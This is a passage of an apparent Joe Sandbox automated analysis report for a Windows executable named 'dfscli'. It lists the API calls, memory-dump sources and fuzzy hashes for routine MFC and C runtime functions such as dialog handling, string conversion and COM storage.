                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00420573
                                                                  • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004205AB
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004205B3
                                                                    • Part of subcall function 00421E24: UnhookWindowsHookEx.USER32(?), ref: 00421E49
                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004205C5
                                                                  • GetDesktopWindow.USER32 ref: 004205F2
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00420600
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0042060F
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0042069E
                                                                  • GetActiveWindow.USER32 ref: 004206A9
                                                                  • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206B7
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                  • String ID:
                                                                  • API String ID: 833315621-0
                                                                  • Opcode ID: 9c049424f7e73ca1598ba7117b6125b43015b5989c775a291803d269f1ce4c2f
                                                                  • Instruction ID: dca9b540c62fcd184cdbaef0817d1578ed90b02519734c6228dfb65e1cce7a9d
                                                                  • Opcode Fuzzy Hash: 9c049424f7e73ca1598ba7117b6125b43015b5989c775a291803d269f1ce4c2f
                                                                  • Instruction Fuzzy Hash: 79418331B00325DFDB21AFA5E84976EBBF5AF44715F90042EE501B2292CB785942CA6D
                                                                  Function 00422CF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00422CFD
                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 00422D15
                                                                  • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 00422D73
                                                                    • Part of subcall function 004222C8: GetWindowRect.USER32(?,004223EA), ref: 004222ED
                                                                    • Part of subcall function 004222C8: GetWindow.USER32(?,00000004), ref: 0042230A
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00422DA3
                                                                  • RemovePropA.USER32(?,AfxOldWndProc423), ref: 00422DAB
                                                                  • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00422DB2
                                                                  • GlobalDeleteAtom.KERNEL32(00000000), ref: 00422DB9
                                                                    • Part of subcall function 00421338: GetWindowRect.USER32(?,?), ref: 00421344
                                                                  • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00422E0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                  • String ID: AfxOldWndProc423
                                                                  • API String ID: 2397448395-1060338832
                                                                  • Opcode ID: 42f8192bdfa06c4a61062a92c3b8c52fd31b5a38a69e1511a4050e6997e842b7
                                                                  • Instruction ID: d0d5fd2a95d0caff163bc92c540bc67e825ba57d28d602554495161fd341ab14
                                                                  • Opcode Fuzzy Hash: 42f8192bdfa06c4a61062a92c3b8c52fd31b5a38a69e1511a4050e6997e842b7
                                                                  • Instruction Fuzzy Hash: D0319632A0012ABFDB11AFA5ED49DFF7F78EF09311F80052AF501A1161C7789912DBA9
                                                                  Function 00421240 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 42libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,00421C6F,?,00040000), ref: 00421249
                                                                  • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00421252
                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00421266
                                                                  • #17.COMCTL32 ref: 00421281
                                                                  • #17.COMCTL32 ref: 0042129D
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004212AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                  • String ID: COMCTL32.DLL$InitCommonControlsEx$`#vp,$v
                                                                  • API String ID: 1437655972-2158789292
                                                                  • Opcode ID: e4adc865601357d86bd5e694327d93582044c89adc3814df3ac42751e02ffd74
                                                                  • Instruction ID: 95cf30dd8ce34ee92b00f566a42e8099b381b461292cc38c6bf4f8d75c531509
                                                                  • Opcode Fuzzy Hash: e4adc865601357d86bd5e694327d93582044c89adc3814df3ac42751e02ffd74
                                                                  • Instruction Fuzzy Hash: 9BF0A936B00222DB97215F66BD4861BB6ECAFA476175504B6F805F3330CB78DC06467D
                                                                  Function 0042B672 Relevance: 15.2, APIs: 10, Instructions: 181memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00431060), ref: 0042B6FD
                                                                    • Part of subcall function 004059C0: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 004059E2
                                                                  • SysAllocString.OLEAUT32(?), ref: 0042B729
                                                                  • lstrlenA.KERNEL32(?,00431060), ref: 0042B741
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B768
                                                                  • lstrlenA.KERNEL32(?,0000F108,?,00000100,004302DC,00431060), ref: 0042B7B6
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B7DF
                                                                  • lstrlenA.KERNEL32(?), ref: 0042B7FF
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B826
                                                                  • lstrlenA.KERNEL32(?), ref: 0042B84F
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B870
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 2903237683-0
                                                                  • Opcode ID: c0277fd87a20140d2149f3f34d2eb646c926a0dbb09a78b738232d21ded5d3b9
                                                                  • Instruction ID: 1a3153decd58b46bd6a0c121a40f0f3a120ecd19db3a4f9c7d82dc57bbc87be9
                                                                  • Opcode Fuzzy Hash: c0277fd87a20140d2149f3f34d2eb646c926a0dbb09a78b738232d21ded5d3b9
                                                                  • Instruction Fuzzy Hash: 54510472A00219EBCB20AF75DC85B9ABBB8FF48354F50452BE915D7281DB38D850CFA4
                                                                  Function 00420977 Relevance: 15.1, APIs: 10, Instructions: 81stringregistryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042097C
                                                                  • GetClassInfoA.USER32(?,?,?), ref: 00420997
                                                                  • RegisterClassA.USER32(?), ref: 004209AA
                                                                  • lstrlenA.KERNEL32(-00000034,00000001), ref: 004209E6
                                                                  • lstrlenA.KERNEL32(?), ref: 004209ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Classlstrlen$H_prologInfoRegister
                                                                  • String ID:
                                                                  • API String ID: 3690589370-0
                                                                  • Opcode ID: 306c1d9e215d0fabf92add2f6d1187e6e5450e128d1fc0b5e055ba4f64e6dba0
                                                                  • Instruction ID: 71e2a2145aac47898e1f733674852a82c0eca1208d8ef585954345c2e418f862
                                                                  • Opcode Fuzzy Hash: 306c1d9e215d0fabf92add2f6d1187e6e5450e128d1fc0b5e055ba4f64e6dba0
                                                                  • Instruction Fuzzy Hash: E531B171A00229EFDF11DF60ED45AAEBFF4FF08315F504126E805A2251C738DA51CBA9
                                                                  Function 0041A8B9 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 228COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: _strcat$___shr_12
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                  • API String ID: 1152255961-4131533671
                                                                  • Opcode ID: 1738a10b470dc6ab355d8796a0499abadeee2c3cf96b2aae57927fffe5d3a795
                                                                  • Instruction ID: f879c1e990ddeebbe466094dc5d8ff8bd54ad08b32661d6171e75fd2fa4a4eb8
                                                                  • Opcode Fuzzy Hash: 1738a10b470dc6ab355d8796a0499abadeee2c3cf96b2aae57927fffe5d3a795
                                                                  • Instruction Fuzzy Hash: 8C81367180528A8ECF11CBA8C9447FF7BB4AF15314F09455BD850EB282D37C9695C3AB
                                                                  Function 00420361 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00420366
                                                                  • GetSystemMetrics.USER32(0000002A), ref: 0042042A
                                                                  • GlobalLock.KERNEL32(00000000,?,?,?,?), ref: 00420495
                                                                  • CreateDialogIndirectParamA.USER32(?,?,?,Function_0001FDFB,00000000), ref: 004204C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                  • String ID: MS Shell Dlg
                                                                  • API String ID: 2364537584-76309092
                                                                  • Opcode ID: 9646e25077798d77b5deeb05f9c54692e781d64a2f7a8cb0eff1768c936a2d1f
                                                                  • Instruction ID: e5cb62502933813201733bd9fc32693ef396ee62b0366fab134f26ca96ffc902
                                                                  • Opcode Fuzzy Hash: 9646e25077798d77b5deeb05f9c54692e781d64a2f7a8cb0eff1768c936a2d1f
                                                                  • Instruction Fuzzy Hash: F551B431B00229DFCB14EFA5E8459EEBBF4AF44314F94456BF502E7292D7388981CB59
                                                                  Function 004159C0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: _strncpy$_strcspn
                                                                  • String ID: ,$,$.$_$_.,
                                                                  • API String ID: 209312476-1893563293
                                                                  • Opcode ID: 2e43a5f81b777912afccb140e69afc6829ec4401cf3e0a016be81a25e8608456
                                                                  • Instruction ID: 094b99d490e66d553d3a6f78acc3330e94534354dd0d36d43b286bc5cd0e5350
                                                                  • Opcode Fuzzy Hash: 2e43a5f81b777912afccb140e69afc6829ec4401cf3e0a016be81a25e8608456
                                                                  • Instruction Fuzzy Hash: 6F216B315C0A06EDEF308A64C881BEB3758AF913E4F584717F8498A281D33CA9C5C79D
                                                                  Function 00425A8C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStockObject.GDI32(00000011), ref: 00425AB0
                                                                  • GetStockObject.GDI32(0000000D), ref: 00425AB8
                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 00425AC5
                                                                  • GetDC.USER32(00000000), ref: 00425AD4
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00425AE8
                                                                  • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00425AF4
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00425AFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                  • String ID: System
                                                                  • API String ID: 46613423-3470857405
                                                                  • Opcode ID: fe69864a35ea89a40515d5fc80cfd6c8ee3fb8849cac013ddd10af84c3ff34a8
                                                                  • Instruction ID: ffff926d86ea4a8282c210a474db753b18fb332d241bf638c921fd37c398010f
                                                                  • Opcode Fuzzy Hash: fe69864a35ea89a40515d5fc80cfd6c8ee3fb8849cac013ddd10af84c3ff34a8
                                                                  • Instruction Fuzzy Hash: 6B115471B00228EBEB20DFA1ED85FAE7B78AF04744F404125F605A71D0D7B49D42CBA8
                                                                  Function 0041ACBC Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CompareStringW.KERNEL32(00000000,00000000,004322C4,00000001,004322C4,00000001,00433B18,00000040,00419FC8,?,00000001,?,00000000,?,00000000,?), ref: 0041ACE8
                                                                  • GetLastError.KERNEL32(?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018,00000000,?,?,0000016D,00000000,?), ref: 0041ACFA
                                                                  • GetCPInfo.KERNEL32(00000000,00000000,00433B18,00000040,00419FC8,?,00000001,?,00000000,?,00000000,?,^@,004176DC,00000000,00000000), ref: 0041ADA4
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AE32
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEC8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AF3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                  • String ID:
                                                                  • API String ID: 1773772771-0
                                                                  • Opcode ID: 5a6277f7f7645b34a1ca5d23e9bca92d5f01ef7ed54ed092bd0c7847a4edd101
                                                                  • Instruction ID: f5f744d86d54cd8ca6db1966468d69e19fe399d0adc8f6adef735f185170d353
                                                                  • Opcode Fuzzy Hash: 5a6277f7f7645b34a1ca5d23e9bca92d5f01ef7ed54ed092bd0c7847a4edd101
                                                                  • Instruction Fuzzy Hash: D0B1C471901209AFCF21DF65DC41AEF7BB6EF08354F14012BF811A62A0D73989E5CB9A
                                                                  Function 0040F55C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __allrem.LIBCMT ref: 0040F614
                                                                  • __allrem.LIBCMT ref: 0040F62C
                                                                  • __allrem.LIBCMT ref: 0040F648
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F683
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F69F
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F6B6
                                                                    • Part of subcall function 004150CA: __lock.LIBCMT ref: 004150E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 4106114094-3067454934
                                                                  • Opcode ID: f69c0a922e78807a0b225c01b9b7e650e9e6c5e0ad57cf8c216420461cf175c5
                                                                  • Instruction ID: 0793e8c0385b27168c5ed49dc395ad643d610412e7e07f13e1331a588879ac93
                                                                  • Opcode Fuzzy Hash: f69c0a922e78807a0b225c01b9b7e650e9e6c5e0ad57cf8c216420461cf175c5
                                                                  • Instruction Fuzzy Hash: 54719F75E00209BFDB24DFA9CC81B9EB7B6EB84314F14817AF510F3691D3789A448B59
                                                                  Function 0040F7B9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004148BE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414930
                                                                  • __allrem.LIBCMT ref: 0040F8CC
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F8ED
                                                                  • __allrem.LIBCMT ref: 0040F909
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F92C
                                                                  • __allrem.LIBCMT ref: 0040F948
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F96B
                                                                    • Part of subcall function 00415116: __lock.LIBCMT ref: 00415124
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 1282128132-3067454934
                                                                  • Opcode ID: 503f9c629e17bedf12aa749e16a2be0b44da8eaeb40d5e21e031042d8dcd9b81
                                                                  • Instruction ID: 6440d212c24c971b3252e86089126bc21e948c25b89904ef9f819ef4e6195108
                                                                  • Opcode Fuzzy Hash: 503f9c629e17bedf12aa749e16a2be0b44da8eaeb40d5e21e031042d8dcd9b81
                                                                  • Instruction Fuzzy Hash: 9C61B3B2900605EFDB24DF69C880AAEB7F5EB84314F24853FE455E3791D7349E898B48
                                                                  Function 00408DE1 Relevance: 12.3, APIs: 8, Instructions: 303memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00408DE6
                                                                    • Part of subcall function 0040780C: CoGetClassObject.OLE32(?,?,00000000,00433C4C,?), ref: 0040782C
                                                                    • Part of subcall function 00426B5A: __EH_prolog.LIBCMT ref: 00426B5F
                                                                    • Part of subcall function 00426B15: __EH_prolog.LIBCMT ref: 00426B1A
                                                                  • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00408F6F
                                                                  • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00408F90
                                                                  • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00408FE3
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00408FF1
                                                                  • GlobalUnlock.KERNEL32(?), ref: 00409009
                                                                  • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 0040902C
                                                                  • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00409048
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                  • String ID:
                                                                  • API String ID: 645133905-0
                                                                  • Opcode ID: 005b3a7b1ba1e7ec0c156c389e7c3750a11e397c02a4dfee90b0cb540f4121ed
                                                                  • Instruction ID: adf4c40781447d7e631396cda822757ebb0fe2e859268748525afa0d866fb1c1
                                                                  • Opcode Fuzzy Hash: 005b3a7b1ba1e7ec0c156c389e7c3750a11e397c02a4dfee90b0cb540f4121ed
                                                                  • Instruction Fuzzy Hash: D8C11A70A00209EFCF14DF65C9889AEBBBAFF88304B10456AF811EB291D779DD41CB65
                                                                  Function 00414AE3 Relevance: 12.2, APIs: 8, Instructions: 212timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 00414AF6
                                                                    • Part of subcall function 004108E8: EnterCriticalSection.KERNEL32(?,?,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00410910
                                                                  • _strlen.LIBCMT ref: 00414B68
                                                                  • _strcat.LIBCMT ref: 00414B85
                                                                  • _strncpy.LIBCMT ref: 00414B9E
                                                                    • Part of subcall function 0040E502: __lock.LIBCMT ref: 0040E520
